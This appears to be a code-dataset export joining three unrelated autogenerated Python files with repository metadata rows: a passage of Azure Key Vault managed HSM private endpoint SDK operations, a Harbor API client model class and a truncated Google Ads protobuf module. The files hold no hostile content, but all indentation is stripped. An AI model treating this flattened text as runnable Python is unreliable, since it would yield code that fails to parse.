raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections"} # type: ignore
@distributed_trace
def get(
self,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> _models.MHSMPrivateEndpointConnection:
"""Gets the specified private endpoint connection associated with the managed HSM Pool.
:param resource_group_name: Name of the resource group that contains the managed HSM pool.
:type resource_group_name: str
:param name: Name of the managed HSM Pool.
:type name: str
:param private_endpoint_connection_name: Name of the private endpoint connection associated
with the managed hsm pool.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MHSMPrivateEndpointConnection, or the result of cls(response)
:rtype: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.MHSMPrivateEndpointConnection]
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
name=name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
template_url=self.get.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ManagedHsmError, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MHSMPrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}"} # type: ignore
@distributed_trace
def put(
self,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
properties: _models.MHSMPrivateEndpointConnection,
**kwargs: Any
) -> _models.MHSMPrivateEndpointConnection:
"""Updates the specified private endpoint connection associated with the managed hsm pool.
:param resource_group_name: Name of the resource group that contains the managed HSM pool.
:type resource_group_name: str
:param name: Name of the managed HSM Pool.
:type name: str
:param private_endpoint_connection_name: Name of the private endpoint connection associated
with the managed hsm pool.
:type private_endpoint_connection_name: str
:param properties: The intended state of private endpoint connection.
:type properties: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MHSMPrivateEndpointConnection, or the result of cls(response)
:rtype: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.MHSMPrivateEndpointConnection]
_json = self._serialize.body(properties, 'MHSMPrivateEndpointConnection')
request = build_put_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
name=name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.put.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
response_headers = {}
response_headers['Retry-After']=self._deserialize('int', response.headers.get('Retry-After'))
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('MHSMPrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
put.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}"} # type: ignore
def _delete_initial(
self,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> Optional[_models.MHSMPrivateEndpointConnection]:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[Optional[_models.MHSMPrivateEndpointConnection]]
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
name=name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
template_url=self._delete_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
response_headers = {}
if response.status_code == 200:
deserialized = self._deserialize('MHSMPrivateEndpointConnection', pipeline_response)
if response.status_code == 202:
response_headers['Retry-After']=self._deserialize('int', response.headers.get('Retry-After'))
response_headers['Location']=self._deserialize('str', response.headers.get('Location'))
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_delete_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}"} # type: ignore
@distributed_trace
def begin_delete(
self,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> LROPoller[_models.MHSMPrivateEndpointConnection]:
"""Deletes the specified private endpoint connection associated with the managed hsm pool.
:param resource_group_name: Name of the resource group that contains the managed HSM pool.
:type resource_group_name: str
:param name: Name of the managed HSM Pool.
:type name: str
:param private_endpoint_connection_name: Name of the private endpoint connection associated
with the managed hsm pool.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either MHSMPrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.MHSMPrivateEndpointConnection]
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
cls=lambda x,y,z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('MHSMPrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
elif polling is False: polling_method = cast(PollingMethod, NoPolling())
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}"} # type: ignore
| [
"[email protected]"
] | |
afeebd636416a886d7f9ed90d354fd7b7d02c895 | 71cc3524493e30366f122fdbdfd4260ca0ae8934 | /harbor_client/model/retention_policy_scope.py | c7b1ef5000b7ed44731db1b1367749fcd29b7d6f | [] | no_license | moule3053/harbor-python-client-api | f293a42bac0e2eee54d43d89af12fb215146bd06 | 31abc14deaf6bb62badc4d9a7b687c60e6fc99eb | refs/heads/master | 2023-08-24T23:16:45.144820 | 2021-10-11T22:54:36 | 2021-10-11T22:54:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,210 | py | """
Harbor API
These APIs provide services for manipulating Harbor project. # noqa: E501
The version of the OpenAPI document: 2.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from harbor_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from harbor_client.exceptions import ApiAttributeError
class RetentionPolicyScope(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'level': (str,), # noqa: E501
'ref': (int,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'level': 'level', # noqa: E501
'ref': 'ref', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""RetentionPolicyScope - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
level (str): [optional] # noqa: E501
ref (int): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""RetentionPolicyScope - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
level (str): [optional] # noqa: E501
ref (int): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| [
"[email protected]"
] | |
da9a073d426253f4f74df5f982a4c0fd2cf697bd | a81c1492783e7cafcaf7da5f0402d2d283b7ce37 | /google/ads/google_ads/v6/proto/resources/ad_group_criterion_pb2.py | 6a447067f79a24f9a96374b62dd4f696aab9a5b9 | [
"Apache-2.0"
] | permissive | VincentFritzsche/google-ads-python | 6650cf426b34392d1f58fb912cb3fc25b848e766 | 969eff5b6c3cec59d21191fa178cffb6270074c3 | refs/heads/master | 2023-03-19T17:23:26.959021 | 2021-03-18T18:18:38 | 2021-03-18T18:18:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 66,824 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v6/resources/ad_group_criterion.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v6.proto.common import criteria_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2
from google.ads.google_ads.v6.proto.common import custom_parameter_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_common_dot_custom__parameter__pb2
from google.ads.google_ads.v6.proto.enums import ad_group_criterion_approval_status_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__approval__status__pb2
from google.ads.google_ads.v6.proto.enums import ad_group_criterion_status_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__status__pb2
from google.ads.google_ads.v6.proto.enums import bidding_source_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2
from google.ads.google_ads.v6.proto.enums import criterion_system_serving_status_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__system__serving__status__pb2
from google.ads.google_ads.v6.proto.enums import criterion_type_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__type__pb2
from google.ads.google_ads.v6.proto.enums import quality_score_bucket_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_quality__score__bucket__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads/v6/resources/ad_group_criterion.proto',
package='google.ads.googleads.v6.resources',
syntax='proto3',
serialized_options=b'\n%com.google.ads.googleads.v6.resourcesB\025AdGroupCriterionProtoP\001ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v6/resources;resources\242\002\003GAA\252\002!Google.Ads.GoogleAds.V6.Resources\312\002!Google\\Ads\\GoogleAds\\V6\\Resources\352\002%Google::Ads::GoogleAds::V6::Resources',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n:google/ads/googleads/v6/resources/ad_group_criterion.proto\x12!google.ads.googleads.v6.resources\x1a-google/ads/googleads/v6/common/criteria.proto\x1a\x35google/ads/googleads/v6/common/custom_parameter.proto\x1a\x46google/ads/googleads/v6/enums/ad_group_criterion_approval_status.proto\x1a=google/ads/googleads/v6/enums/ad_group_criterion_status.proto\x1a\x32google/ads/googleads/v6/enums/bidding_source.proto\x1a\x43google/ads/googleads/v6/enums/criterion_system_serving_status.proto\x1a\x32google/ads/googleads/v6/enums/criterion_type.proto\x1a\x38google/ads/googleads/v6/enums/quality_score_bucket.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a\x1cgoogle/api/annotations.proto\"\xe2$\n\x10\x41\x64GroupCriterion\x12H\n\rresource_name\x18\x01 \x01(\tB1\xe0\x41\x05\xfa\x41+\n)googleads.googleapis.com/AdGroupCriterion\x12\x1e\n\x0c\x63riterion_id\x18\x38 \x01(\x03\x42\x03\xe0\x41\x03H\x01\x88\x01\x01\x12`\n\x06status\x18\x03 \x01(\x0e\x32P.google.ads.googleads.v6.enums.AdGroupCriterionStatusEnum.AdGroupCriterionStatus\x12Z\n\x0cquality_info\x18\x04 \x01(\x0b\x32?.google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfoB\x03\xe0\x41\x03\x12?\n\x08\x61\x64_group\x18\x39 \x01(\tB(\xe0\x41\x05\xfa\x41\"\n googleads.googleapis.com/AdGroupH\x02\x88\x01\x01\x12Q\n\x04type\x18\x19 \x01(\x0e\x32>.google.ads.googleads.v6.enums.CriterionTypeEnum.CriterionTypeB\x03\xe0\x41\x03\x12\x1a\n\x08negative\x18: \x01(\x08\x42\x03\xe0\x41\x05H\x03\x88\x01\x01\x12\x80\x01\n\x15system_serving_status\x18\x34 \x01(\x0e\x32\\.google.ads.googleads.v6.enums.CriterionSystemServingStatusEnum.CriterionSystemServingStatusB\x03\xe0\x41\x03\x12~\n\x0f\x61pproval_status\x18\x35 \x01(\x0e\x32`.google.ads.googleads.v6.enums.AdGroupCriterionApprovalStatusEnum.AdGroupCriterionApprovalStatusB\x03\xe0\x41\x03\x12 \n\x13\x64isapproval_reasons\x18; \x03(\tB\x03\xe0\x41\x03\x12\x19\n\x0c\x62id_modifier\x18= \x01(\x01H\x04\x88\x01\x01\x12\x1b\n\x0e\x63pc_bid_micros\x18> \x01(\x03H\x05\x88\x01\x01\x12\x1b\n\x0e\x63pm_bid_micros\x18? \x01(\x03H\x06\x88\x01\x01\x12\x1b\n\x0e\x63pv_bid_micros\x18@ \x01(\x03H\x07\x88\x01\x01\x12#\n\x16percent_cpc_bid_micros\x18\x41 \x01(\x03H\x08\x88\x01\x01\x12*\n\x18\x65\x66\x66\x65\x63tive_cpc_bid_micros\x18\x42 \x01(\x03\x42\x03\xe0\x41\x03H\t\x88\x01\x01\x12*\n\x18\x65\x66\x66\x65\x63tive_cpm_bid_micros\x18\x43 \x01(\x03\x42\x03\xe0\x41\x03H\n\x88\x01\x01\x12*\n\x18\x65\x66\x66\x65\x63tive_cpv_bid_micros\x18\x44 \x01(\x03\x42\x03\xe0\x41\x03H\x0b\x88\x01\x01\x12\x32\n effective_percent_cpc_bid_micros\x18\x45 \x01(\x03\x42\x03\xe0\x41\x03H\x0c\x88\x01\x01\x12\x65\n\x18\x65\x66\x66\x65\x63tive_cpc_bid_source\x18\x15 \x01(\x0e\x32>.google.ads.googleads.v6.enums.BiddingSourceEnum.BiddingSourceB\x03\xe0\x41\x03\x12\x65\n\x18\x65\x66\x66\x65\x63tive_cpm_bid_source\x18\x16 \x01(\x0e\x32>.google.ads.googleads.v6.enums.BiddingSourceEnum.BiddingSourceB\x03\xe0\x41\x03\x12\x65\n\x18\x65\x66\x66\x65\x63tive_cpv_bid_source\x18\x17 \x01(\x0e\x32>.google.ads.googleads.v6.enums.BiddingSourceEnum.BiddingSourceB\x03\xe0\x41\x03\x12m\n effective_percent_cpc_bid_source\x18# \x01(\x0e\x32>.google.ads.googleads.v6.enums.BiddingSourceEnum.BiddingSourceB\x03\xe0\x41\x03\x12\x66\n\x12position_estimates\x18\n \x01(\x0b\x32\x45.google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimatesB\x03\xe0\x41\x03\x12\x12\n\nfinal_urls\x18\x46 \x03(\t\x12\x19\n\x11\x66inal_mobile_urls\x18G \x03(\t\x12\x1d\n\x10\x66inal_url_suffix\x18H \x01(\tH\r\x88\x01\x01\x12\"\n\x15tracking_url_template\x18I \x01(\tH\x0e\x88\x01\x01\x12N\n\x15url_custom_parameters\x18\x0e \x03(\x0b\x32/.google.ads.googleads.v6.common.CustomParameter\x12\x43\n\x07keyword\x18\x1b \x01(\x0b\x32+.google.ads.googleads.v6.common.KeywordInfoB\x03\xe0\x41\x05H\x00\x12G\n\tplacement\x18\x1c \x01(\x0b\x32-.google.ads.googleads.v6.common.PlacementInfoB\x03\xe0\x41\x05H\x00\x12Y\n\x13mobile_app_category\x18\x1d \x01(\x0b\x32\x35.google.ads.googleads.v6.common.MobileAppCategoryInfoB\x03\xe0\x41\x05H\x00\x12X\n\x12mobile_application\x18\x1e \x01(\x0b\x32\x35.google.ads.googleads.v6.common.MobileApplicationInfoB\x03\xe0\x41\x05H\x00\x12N\n\rlisting_group\x18 \x01(\x0b\x32\x30.google.ads.googleads.v6.common.ListingGroupInfoB\x03\xe0\x41\x05H\x00\x12\x46\n\tage_range\x18$ \x01(\x0b\x32,.google.ads.googleads.v6.common.AgeRangeInfoB\x03\xe0\x41\x05H\x00\x12\x41\n\x06gender\x18% \x01(\x0b\x32*.google.ads.googleads.v6.common.GenderInfoB\x03\xe0\x41\x05H\x00\x12L\n\x0cincome_range\x18& \x01(\x0b\x32/.google.ads.googleads.v6.common.IncomeRangeInfoB\x03\xe0\x41\x05H\x00\x12R\n\x0fparental_status\x18\' \x01(\x0b\x32\x32.google.ads.googleads.v6.common.ParentalStatusInfoB\x03\xe0\x41\x05H\x00\x12\x46\n\tuser_list\x18* \x01(\x0b\x32,.google.ads.googleads.v6.common.UserListInfoB\x03\xe0\x41\x05H\x00\x12N\n\ryoutube_video\x18( \x01(\x0b\x32\x30.google.ads.googleads.v6.common.YouTubeVideoInfoB\x03\xe0\x41\x05H\x00\x12R\n\x0fyoutube_channel\x18) \x01(\x0b\x32\x32.google.ads.googleads.v6.common.YouTubeChannelInfoB\x03\xe0\x41\x05H\x00\x12?\n\x05topic\x18+ \x01(\x0b\x32).google.ads.googleads.v6.common.TopicInfoB\x03\xe0\x41\x05H\x00\x12N\n\ruser_interest\x18- \x01(\x0b\x32\x30.google.ads.googleads.v6.common.UserInterestInfoB\x03\xe0\x41\x05H\x00\x12\x43\n\x07webpage\x18. \x01(\x0b\x32+.google.ads.googleads.v6.common.WebpageInfoB\x03\xe0\x41\x05H\x00\x12U\n\x11\x61pp_payment_model\x18/ \x01(\x0b\x32\x33.google.ads.googleads.v6.common.AppPaymentModelInfoB\x03\xe0\x41\x05H\x00\x12R\n\x0f\x63ustom_affinity\x18\x30 \x01(\x0b\x32\x32.google.ads.googleads.v6.common.CustomAffinityInfoB\x03\xe0\x41\x05H\x00\x12N\n\rcustom_intent\x18\x31 \x01(\x0b\x32\x30.google.ads.googleads.v6.common.CustomIntentInfoB\x03\xe0\x41\x05H\x00\x12R\n\x0f\x63ustom_audience\x18J \x01(\x0b\x32\x32.google.ads.googleads.v6.common.CustomAudienceInfoB\x03\xe0\x41\x05H\x00\x12V\n\x11\x63ombined_audience\x18K \x01(\x0b\x32\x34.google.ads.googleads.v6.common.CombinedAudienceInfoB\x03\xe0\x41\x05H\x00\x1a\x8d\x03\n\x0bQualityInfo\x12\x1f\n\rquality_score\x18\x05 \x01(\x05\x42\x03\xe0\x41\x03H\x00\x88\x01\x01\x12m\n\x16\x63reative_quality_score\x18\x02 \x01(\x0e\x32H.google.ads.googleads.v6.enums.QualityScoreBucketEnum.QualityScoreBucketB\x03\xe0\x41\x03\x12o\n\x18post_click_quality_score\x18\x03 \x01(\x0e\x32H.google.ads.googleads.v6.enums.QualityScoreBucketEnum.QualityScoreBucketB\x03\xe0\x41\x03\x12k\n\x14search_predicted_ctr\x18\x04 \x01(\x0e\x32H.google.ads.googleads.v6.enums.QualityScoreBucketEnum.QualityScoreBucketB\x03\xe0\x41\x03\x42\x10\n\x0e_quality_score\x1a\xbc\x03\n\x11PositionEstimates\x12\'\n\x15\x66irst_page_cpc_micros\x18\x06 \x01(\x03\x42\x03\xe0\x41\x03H\x00\x88\x01\x01\x12+\n\x19\x66irst_position_cpc_micros\x18\x07 \x01(\x03\x42\x03\xe0\x41\x03H\x01\x88\x01\x01\x12(\n\x16top_of_page_cpc_micros\x18\x08 \x01(\x03\x42\x03\xe0\x41\x03H\x02\x88\x01\x01\x12<\n*estimated_add_clicks_at_first_position_cpc\x18\t \x01(\x03\x42\x03\xe0\x41\x03H\x03\x88\x01\x01\x12:\n(estimated_add_cost_at_first_position_cpc\x18\n \x01(\x03\x42\x03\xe0\x41\x03H\x04\x88\x01\x01\x42\x18\n\x16_first_page_cpc_microsB\x1c\n\x1a_first_position_cpc_microsB\x19\n\x17_top_of_page_cpc_microsB-\n+_estimated_add_clicks_at_first_position_cpcB+\n)_estimated_add_cost_at_first_position_cpc:t\xea\x41q\n)googleads.googleapis.com/AdGroupCriterion\x12\x44\x63ustomers/{customer_id}/adGroupCriteria/{ad_group_id}~{criterion_id}B\x0b\n\tcriterionB\x0f\n\r_criterion_idB\x0b\n\t_ad_groupB\x0b\n\t_negativeB\x0f\n\r_bid_modifierB\x11\n\x0f_cpc_bid_microsB\x11\n\x0f_cpm_bid_microsB\x11\n\x0f_cpv_bid_microsB\x19\n\x17_percent_cpc_bid_microsB\x1b\n\x19_effective_cpc_bid_microsB\x1b\n\x19_effective_cpm_bid_microsB\x1b\n\x19_effective_cpv_bid_microsB#\n!_effective_percent_cpc_bid_microsB\x13\n\x11_final_url_suffixB\x18\n\x16_tracking_url_templateB\x82\x02\n%com.google.ads.googleads.v6.resourcesB\x15\x41\x64GroupCriterionProtoP\x01ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v6/resources;resources\xa2\x02\x03GAA\xaa\x02!Google.Ads.GoogleAds.V6.Resources\xca\x02!Google\\Ads\\GoogleAds\\V6\\Resources\xea\x02%Google::Ads::GoogleAds::V6::Resourcesb\x06proto3'
,
